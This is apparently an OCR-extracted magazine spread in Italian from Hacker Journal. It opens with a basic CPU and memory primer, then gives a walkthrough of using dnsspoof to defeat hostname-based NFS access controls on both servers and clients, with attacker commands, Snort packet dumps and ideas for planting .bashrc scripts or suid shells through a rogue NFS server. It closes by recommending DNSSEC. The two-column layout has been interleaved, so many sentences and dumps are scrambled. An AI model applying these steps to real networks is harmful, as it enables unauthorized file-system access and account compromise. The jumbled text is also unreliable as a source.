tura dalla memoria e scrittura in memoria: I principali elementi della CPU sono: po di memoria, spesso ignorato perke’ non
ogni cella di memoria può essere “indiriz- -Unità di controlli: preleva, decodifica ed comunemente espandibile: parliamo della
zata” (equivale ad assegnarle un numero a esegue elaborazioni e trasferimenti; ROM (Read Only Memory). Questa zona di
seconda della sua posizione) e quindi “pun- Clock: (Orologio di sistema) sincronizza memoria in cui le operazioni sono limitate
tata”...(tranquilli, se avrete passione e tem- e coordina tutte le operazioni; alla sola lettura, contiene le informazioni
po tutto si chiarirà!). Le posizioni e gli indi- -ALU: (Unità Aritmetico-Logica) realiz- fondamentali per il funzionamento del si-
rizzi delle celle sono contenute tutte nel Re- za tutte le operazioni aritmetico logiche (ad- stema, registrate in modo permanente e
gistro Indirizzi. dizione, algebra booleana...); non volatile (definite spesso “Firmware”).
Il Registro Dati, invece, contiene i dati Come abbiamo detto in precedenza, il pro-
che devono essere immagazzinati in me-
moria, o che sono stati estratti da essa.
Cpu
Quando estraiamo un dato dalla memoria
(per esempio un’immagine),noi indichiamo 01010101
Bus

quale dato estrarre, il Registro Indirizzi ne


fornisce la posizione e la CPU copia il con- Bu
s
tenuto della cella di memoria nel Registro
Dati (lungo quanto una WORD), riempen-
Controlli

dolo (ovvero “caricandolo” in memoria).


B u s d ati

>> Il Bus
Nel momento in cui decidiamo di salvare
un documento nel nostro piccì, effettuiamo
un’operazione di scrittura in memoria. Il
computer altro non fà che copiare il Regi-
01010101
stro Dati in una cella di memoria, deposi-
tandolo (STORE). Il Bus mette in comunica- Figura 4
Funzioni dei vari Bus della macchina

www.hackerjournal.it |27
dossier

COME SFRUTTARE UN BACO DI BIND PER INSERIRSI IN UN FILE SYSTEM DI RETE

Network File System attaccati con Dns Spoofing


Il servizio DNS di Internet ha dei preoccupanti bachi di sicurezza, che possono
essere utilizzati da burloni per spedire le persone su siti diversi da quelli richiesti,
ma che permettono anche di attaccare reti che basano l’autenticazione degli utenti
su questo insicuro servizio.

espone il nostro sistema ad enormi rischi e andrebbe per tan-


to evitata. Ad ogni modo vediamo come un attacker possa ser-
virsi dello spoofing del DNS al fine di guadagnare un accesso
non autorizzato ai rami condivisi del nostro filesystem.

H Hostname IP Descrizione
attack.linuxbox.com 192.168.1.4 Host dell’attacker
dns.linuxbox.com 192.168.1.5 Server DNS
attack.linuxbox.it 192.168.1.6 Client “fidato”
victim.linuxbox.com 192.168.1.7 Server NFS

Ecco un possibile scenario in cui potrebbe verificarsi un attacco


alle risorse condivise del sistema victim operando da un ipote-
tico sistema attack, gli host in gioco sono ancora una volta
quelli utilizzati nel corso dell’esempio precedente:
Il sistema victim.linuxbox.com si presenta configurato come se-
gue:

N
e llo scorso numero abbiamo visto come è possibile in- /etc/exports:
serirsi in una richiesta di connessione Internet utiliz- /home/ftp trust.linuxbox.com(ro)
zando un baco del software Bind, che sovraintende il
servizio Dns. Questa volta vediamo come questa falla Il file /etc/exports così dichiarato permette (dovrebbe permette-
può essere sfruttata per attaccare un Network File re) l’accesso in sola lettura (ro) alla home directory dell’utente ftp
System (NFS). Se vi siete persi l’articolo precedente, al solo sistema che risponde all’hostname trust.linuxbox.com.
andatevi a recuperare l’arretrato in formato Pdf, su www.hac-
kerjounal.it; ne vale la pena. Vediamo cosa accade durante il boot del sistema nel momento
I servizi NFS sono stati sviluppati allo scopo di permettere il in cui lo script rc.nfsd (Slackware8.0) inizializza i servizi NFS:
mount di partizioni di disco remote, se mal configurato questo
servizio può essere tratto in inganno da un utente remoto non Starting NFS services:
autorizzato che voglia accedere alle partizioni condivise. NFS si /usr/sbin/exportfs -r
serve del file /etc/exports per determinare la legittimità o meno /usr/sbin/rpc.rquotad
delle richieste di mount remote, in tale file sono pertanto indi- /usr/sbin/rpc.nfsd 8
cate le risorse che si desidera condividere e le macchine auto- /usr/sbin/rpc.mountd —no-nfs-version 3
rizzate ad accedere a tali condivisioni. /usr/sbin/rpc.lockd
Al momento dell’avvio dei servizi NFS il file /etc/exports viene /usr/sbin/rpc.statd
processato dal comando exportfs -r che viene di norma avviato
automaticamente dallo script di inizializzazione dei servizi. Nel Nel preciso istante in cui lo script rc.nfsd avvia exportfs -r il fi-
qual caso tale file contenesse riferimenti ad hostname il sistema le /etc/exports viene processato e il nome host trust.linux-
box.com viene risolto nel relativo indirizzo IP tramite DNS
query, in tal modo in presenza di una richiesta di mount futu-
>> NFS server bypass ra il server NFS non avrà più l’esigenza di interrogare il na-
meserver ma si avvarrà dell’IP memorizzato a tempo di boot
sarà costretto alla risoluzione degli stessi mediante query DNS per soddisfare qualsiasi richiesta. Pertanto il solo momento in
che potrebbero rendere il sistema soggetto ad accessi non au- cui i servizi NFS risultano vulnerabili allo spoofing del DNS è
torizzati. rappresentato dal momento in cui esso aggiorna la tabella
Come avrete avuto modo di capire, la pratica comune di inse- delle condivisioni, di norma tale operazione viene svolta du-
rire hostname all’interno di liste per il controllo degli accessi rante il boot o su richiesta dell’amministratore.

28 | www.hackerjournal.it
>>
L’output di Snort ci offre la possibilità di loggare i pacchetti che l’IP 192.168.1.6 (trust) risolto a boot time. E’ importante notare
transitano durante questa operazione, ovvero quali query ven- che nel momento della richiesta di mount da parte di un client
gono inoltrate da victim verso il DNS e quali risposte riceve da remoto il server NFS non ha la necessità di consultare il DNS in
quest’ultimo: quanto la risoluzione dell’hostname è avvenuta a tempo di boot.
Ne consegue che se un malintenzionato volesse eludere i con-
attacker@attack:~# snort -vd udp port 53 trolli di sicurezza di NFS dovrebbe agire durante il processo di
02/20-13:18:28.241483 192.168.1.7:1072 -> 192.168.1.5:53 avvio del server, qui di seguito mi limito ad illustrare in pochi e
UDP TTL:120 TOS:0x0 ID:35227 IpLen:20 DgmLen:64 DF semplici passi come potrebbe procedere al fine di perseguire il
Len: 44 suo scopo:
4F 5D 01 00 00 01 00 00 00 00 00 00 05 74 72 75 O]...........tru
73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.linuxbox.com. attacker@attack:~# dnsspoof -f ~/hosts.txt
00 01 00 01 ... dnsspoof: listening on eth0 [udp dst port 53 and not src
192.168.1.4]
Victim invia una query intesa a risolvere l’hostname trust.linux-
box.com che si trova nel file /etc/exports, questa operazione vie- L’attacker mette in ascolto Dnsspoof sul proprio sistema in atte-
ne eseguita a tempo di boot o su richiesta dell’admin... sa di intercettare le DNS query causate dall’inizializzazione dei
servizi NFS sulla macchina della vittima, nell’intento di restituire
02/20-13:18:28.242207 192.168.1.5:53 -> 192.168.1.7:1072 a victim delle reply a tali interrogazioni che riportino come IP del
UDP TTL:64 TOS:0x0 ID:395 IpLen:20 DgmLen:114 sistema trust l’IP stesso dell’host da cui l’attacker sta operando,
Len: 94 ovvero 192.168.1.4. Le reply fasulle forgiate da Dnsspoof do-
4F 5D 85 80 00 01 00 01 00 01 00 01 05 74 72 75 O]...........tru vranno giungere a victim prima che tale sistema sia raggiunto
73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.linuxbox.com. dalle reply lecite inviategli dal DNS. Qui di seguito vediamo i
00 01 00 01 C0 0C 00 01 00 01 00 01 51 80 00 04 ............Q... messaggi che il server victim invia verso l’output standard a te-
C0 A8 01 06 C0 12 00 02 00 01 00 01 51 80 00 06 ............Q... stimonianza del fatto che sta procedendo all’ inizializzazione di
03 64 6E 73 C0 12 C0 40 00 01 00 01 00 01 51 80 .dns...@......Q. tali servizi:
00 04 C0 A8 01 05 ......
Starting NFS services:
Il server DNS restituisce a victim la risposta contenente l’IP dell’- /usr/sbin/exportfs -r
host trust.linuxbox.com ovvero 192.168.1.6, in fututo quando il /usr/sbin/rpc.rquotad
server NFS riceverà una richiesta di mount remota confronterà /usr/sbin/rpc.nfsd 8
l’indirizzo IP del richiedente con quello ottenuto da questa reply /usr/sbin/rpc.mountd —no-nfs-version 3
e nel qual caso dovessero risultare uguali permetterà il pieno /usr/sbin/rpc.lockd
accesso al filesystem. /usr/sbin/rpc.statd
La stessa query si ripete moltplici volte di conseguenza l’output
restante di Snort è stato omesso in quanto ritenuto poco signifi- Segue poi l’output di Dnsspoof che ha catturato e risposto a 4
cativo. Se ora dovessimo provare a fare mount da un sistema query rivolte al nameserver (192.168.1.5) da parte di victim
diverso da trust il risultato sarebbe il seguente: (192.168.1.7):

attacker@attack:~# mount 192.168.1.7:/home/ftp /mnt/nfs attacker@attack:~# dnsspoof -f ~/hosts.txt


mount: 192.168.1.7:/home/ftp failed, reason given by server: dnsspoof: listening on eth0 [udp dst port 53 and not src
Permission 192.168.1.4]
denied 192.168.1.7.1074 > 192.168.1.5.53: 62892+ A? trust.linuxbox.com
192.168.1.7.1074 > 192.168.1.5.53: 62893+ A? trust.linuxbox.com
Come atteso la nostra richiesta di mount viene scartata in quan- 192.168.1.7.1076 > 192.168.1.5.53: 6343+ A? trust.linuxbox.com
to proviene dall’IP 192.168.1.4 (attack) che è ben diverso dal- 192.168.1.7.1076 > 192.168.1.5.53: 6344+ A? trust.linuxbox.com

Vediamo il tutto dalla prospettiva offerta da Snort, ovvero come


si sono svolte le cose a livello di pacchetto:

attacker@attack:~# snort -vd udp port 53


02/20-14:29:39.685629 192.168.1.7:1074 -> 192.168.1.5:53
UDP TTL:145 TOS:0x0 ID:8247 IpLen:20 DgmLen:64 DF
Len: 44
F5 AC 01 00 00 01 00 00 00 00 00 00 05 74 72 75
.............tru
73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-
nuxbox.com.
00 01 00 01 ....

Snort è un Network Intrusion Detector open source, disponibile per 02/20-14:29:39.686343 192.168.1.5:53 -> 192.168.1.7:1074
svariati sistemi *nix. Lo si può scaricare da www.snort.org UDP TTL:64 TOS:0x0 ID:416 IpLen:20 DgmLen:114

www.hackerjournal.it | 29
dossier

COME SFRUTTARE UN BACO DI BIND PER INSERIRSI IN UN FILE SYSTEM DI RETE

Len: 94 .9...........tru
F5 AC 85 80 00 01 00 01 00 01 00 01 05 74 72 75 73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-
.............tru nuxbox.com.
73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li- 00 01 00 01 ....
nuxbox.com.
00 01 00 01 C0 0C 00 01 00 01 00 01 51 80 00 04
............Q... 02/20-14:49:48.214328 192.168.1.5:53 -> 192.168.1.7:1079
C0 A8 01 06 C0 12 00 02 00 01 00 01 51 80 00 06 UDP TTL:64 TOS:0x0 ID:426 IpLen:20 DgmLen:114
............Q... Len: 94
03 64 6E 73 C0 12 C0 40 00 01 00 01 00 01 51 80 CD 39 85 80 00 01 00 01 00 01 00 01 05 74 72 75
.dns...@......Q. .9...........tru
00 04 C0 A8 01 05 ...... 73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-
nuxbox.com.
Questo secondo pacchetto è giunto a destinazione (victim) ma è 00 01 00 01 C0 0C 00 01 00 01 00 01 51 80 00 04
stato ignorato in quanto PRECEDUTO dalla risposta fasulla for- ............Q...
nita da Dnsspoof. Ora non ci resta che terminare l’esecuzione C0 A8 01 06 C0 12 00 02 00 01 00 01 51 80 00 06
di Dnsspoof e accedere alle condivisioni di victim come se fossi- ............Q...
mo l’host legittimo: 03 64 6E 73 C0 12 C0 40 00 01 00 01 00 01 51 80
.dns...@......Q.
attacker@attack:~# mount 192.168.1.7:/home/ftp /mnt/nfs 00 04 C0 A8 01 05 ......
attacker@attack:~#
A questo punto nel momento stesso in cui facciamo il primo ten-
Ora abbiamo accesso in sola lettura (ro) al ramo del filesystem tativo di mount da un host non autorizzato notiamo una cosa
remoto, e possiamo incominciare a riflettere sui reali problemi molto strana, ossia...
in cui possiamo incorrere a causa di un’amministrazione super-
ficiale di tali risorse. attacker@attack:~# snort -vd udp port 53
02/20-14:52:05.417517 192.168.1.7:1079 -> 192.168.1.5:53
UDP TTL:197 TOS:0x0 ID:25875 IpLen:20 DgmLen:64 DF
>> l comando Exports Len: 44
28 CB 01 00 00 01 00 00 00 00 00 00 05 74 72 75
Questo comando viene utilizzato per mantenere aggiornata la (............tru
tabella delle condivisioni sul sistema server, in particolare è lo 73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-
script di inizializzazione dei servizi NFS stesso a preoccuparsi nuxbox.com.
di svolgere tale mansione per mezzo della chiamata exportfs - 00 01 00 01 ....
r. Tuttavia tale comando può contribuire ad aprire un varco
nella sicurezza del sistema qualora venga richiamato in un 02/20-14:52:05.418237 192.168.1.5:53 -> 192.168.1.7:1079
tempo successivo all’ esecuzione del demone mountd, questo UDP TTL:64 TOS:0x0 ID:429 IpLen:20 DgmLen:114
può verificarsi a causa di uno script inaffidabile o per mano Len: 94
dell’admin che richiama tale comando da console. Ho effet- 28 CB 85 80 00 01 00 01 00 01 00 01 05 74 72 75
tuato questa scoperta in maniera del tutto casuale durante i (............tru
probe che ho effettuato lungo il corso della stesura del pre- 73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-
sente articolo, premetto che ho avuto modo di testare il pre- nuxbox.com.
sunto bug solo su un sistema che monta Slackware8.0 e ker- 00 01 00 01 C0 0C 00 01 00 01 00 01 51 80 00 04
nel 2.4.17. ............Q...
Ecco un esempio, mettiamo che l’admin decida di modificare C0 A8 01 06 C0 12 00 02 00 01 00 01 51 80 00 06
il file /etc/exports e di conseguenza debba aggiornare le ta- ............Q...
belle delle condivisioni con l’ausilio di exportfs -r senza prima 03 64 6E 73 C0 12 C0 40 00 01 00 01 00 01 51 80
provvedere all’ arresto dei demoni interessati: .dns...@......Q.
00 04 C0 A8 01 05 ......
victim@victim:~# exportfs -r
Facciamo il punto della situazione:
Come possiamo vedere dall’output di Snort riportato qui di se- - i demoni erano in esecuzione
guito, il file /etc/exports viene processato e l’hostname (trust) - viene richiamato exportfs -r
contenuto in esso viene risolto nell’IP corrispondente - trust.linuxbox.com viene risolto in 192.168.1.6 - tale IP viene
(192.168.1.6): memorizzato per impedire query durante le richieste di mount
che potranno verificarsi in futuro e che sarebbero altriementi
attacker@attack:~# snort -vd udp port 53 soggette a vulnerabilità dovute al DNS spoofing
02/20-14:49:48.213636 192.168.1.7:1079 -> 192.168.1.5:53 - prima richiesta di mount
UDP TTL:236 TOS:0x0 ID:19927 IpLen:20 DgmLen:64 DF - viene nuovamente richiesta la risoluzione di trust!!!
Len: 44
CD 39 01 00 00 01 00 00 00 00 00 00 05 74 72 75 In parole povere, se exportfs -r è stato richiamato mentre mountd

30 | www.hackerjournal.it
>>
era in esecuzione, e siamo i primi a richiedere il mount, allora attacker@attack:~# dnsspoof -f ~/hosts.txt
causeremo una query DNS da parte di victim e saremo in grado dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.4
di fornire una risposta arbitraria avvalendosi di Dnsspoof e per-
mettendo il mount del filesystem da parte dell’host desiderato! La vittima richiede di montare la porzione di filesystem /home/ftp
per esempio, l’admin ha appena modificato il file delle esporta- dal sistema trust...
zioni e desidera che le modifiche apportate abbiano effetto, a ta-
le scopo esegue il comando necessario (il demone mountd è in victim@victim:~# mount trust.linuxbox.com:/home/ftp /mnt/nfs
esecuzione): victim@victim:~#

victim@victim:~# exportfs -r ...in realtà la sua richiesta viene inoltrata a 192.168.1.4, IP sug-
geritogli dalla reply fasulla forgiata da Dnsspoof:
Terminata l’esecuzione del comando exportfs, l’attacker pone
Dnsspoof in ascolto sull’interfaccia di rete e... attacker@attack:~# dnsspoof -f ~/hosts.txt
dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.4]
attacker@attack:~# dnsspoof -f ~/hosts.txt 192.168.1.7.1034> 192.168.1.5.53: 62600+ A? trust.linuxbox.com
dnsspoof: listening on eth0 [udp dst port 53 and not src
192.168.1.4] Una pratica comune che sarebbe bene evitare è quella di in-
serire una voce in /etc/fstab che esegua il mount di un filesy-
...si prepara a richiedere il mount: stem NFS, il fatto stesso di automatizzare l’operazione espone
i client NFS a rischi ancora maggiori.
attacker@attack:~# mount 192.168.1.7:/home/ftp /mnt/nfs Ora vi starete chiedendo, “che interessi può avere un utente
attacker@attack:~# malizioso ad ingannare un client NFS al fine di forzare il
mount di un filesystem differente da quello previsto”? Ecco al-
le query rivolte a risolvere l’hostname di trust.linuxbox.com ven- cuni esempi:
gono intercettate e le risposte fasulle vengono inviate al server 1) Molti sistemi con funzione di workstation montano le /home
NFS victim che permette il mount da parte del sistema attacker: degli utenti da remoto durante il boot; se un attacker fosse in
grado di forzare il mount in lettura/scrittura di una home fitti-
attacker@attack:~# dnsspoof -f ~/hosts.txt zia che si trova sul proprio sistema, potrebbe venire in posses-
dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.4] so di dati di fondamentale importanza per l’integrità dell’ac-
192.168.1.7.1034 > 192.168.1.5.53: 43182+ A? trust.linuxbox.com count utente attaccato, quali ad esempio .bash_history.
192.168.1.7.1034 > 192.168.1.5.53: 43183+ A? trust.linuxbox.com 2) Come nell’esempio precedente, se l’attacker fosse in grado
di montare una directory home fittizia potrebbe inserire in es-
sa script come .bash_profile o .bashrc in grado di eseguire po-
>> NFS client bypass tenzialmente qualsiasi operazione al momento del login.
3) Se l’attacker ha accesso al sistema victim come utente ge-
Ora la situazione si è invertita, la vittima è il client NFS e deve nerico e tale sistema, in seguito alla presenza di una voce nel
accedere al server NFS trust.linuxbox.com al quale ha accesso file /etc/fstab, esegue un mount automatico tramite NFS, po-
regolare. Lo scopo di colui che attacca è quello di far connette- trà essere forzato a montare un filesystem aggressivo al fine di
re in maniera del tutto inconsapevole la vittima a un server NFS mettere a disposizione di attacker file potenzialmente dannosi
fasullo. Nell’esempio il server NFS “aggressivo” si trova sul si- per la sicurezza stessa del sistema, per esempio suid shell o
stema stesso dell’attacker da cui partirà l’attacco di DNS spoo- script perl setuserid. L’utilizzo delle opzioni nosuid e noexec del
fing. Ancora una volta condizione necessaria alla riuscita del- comando mount non sempre offrono la sicurezza sperata, e
l’attacco è data dall’utilizzo del nome host da parte del lato possono essere aggirate agilmente con semplici accorgimenti:
client NFS al fine di accedere alle risorse remote. L’attacker de-
ve disporre sul server NFS fasullo (il sistema attack.linuxbox.com) - nosuid NON impedisce l’esecuzione di script Perl tramite
un file exports che permetta l’accesso inconsapevole della vittima: Suidperl
- noexec NON impedisce che i file dannosi vengano copiati su
/etc/exports: un altro filesystem dove potranno essere eseguiti.
/home/ftp 192.168.1.7(ro)

l’attacker mette in ascolto Dnsspoof, in questo modo qualsiasi ri-


>> Quali cntromisure prendere
chiesta di mount da parte di un client NFS che abbia come desti-
natario il sistema trust verrà reindirizzata verso il server NFS fasul- Un buon rimedio è rappresentato dall’utilizzo di software qua-
lo (attack) in maniera del tutto trasparente alla vittima: le DNSSEC che applica una firma digitale per assicurare la
provenienza legittima delle reply da parte di un server DNS
H Hostname IP Descrizione autorizzato. Effetti collaterali quali la necessità di maggiore
banda a disposizione, maggior mole di lavoro per la macchi-
attack.linuxbox.com 192.168.1.4 Server NFS Fasullo na e per l’amministratore del sistema sono la causa principa-
dns.linuxbox.com 192.168.1.5 Server DNS le della lenta diffusione di DNSSEC. K
trust.linuxbox.it 192.168.1.6 Client “fidato” E4zy ~ OQ Staff
victim.linuxbox.com 192.168.1.7 Client NFS

www.hackerjournal.it | 31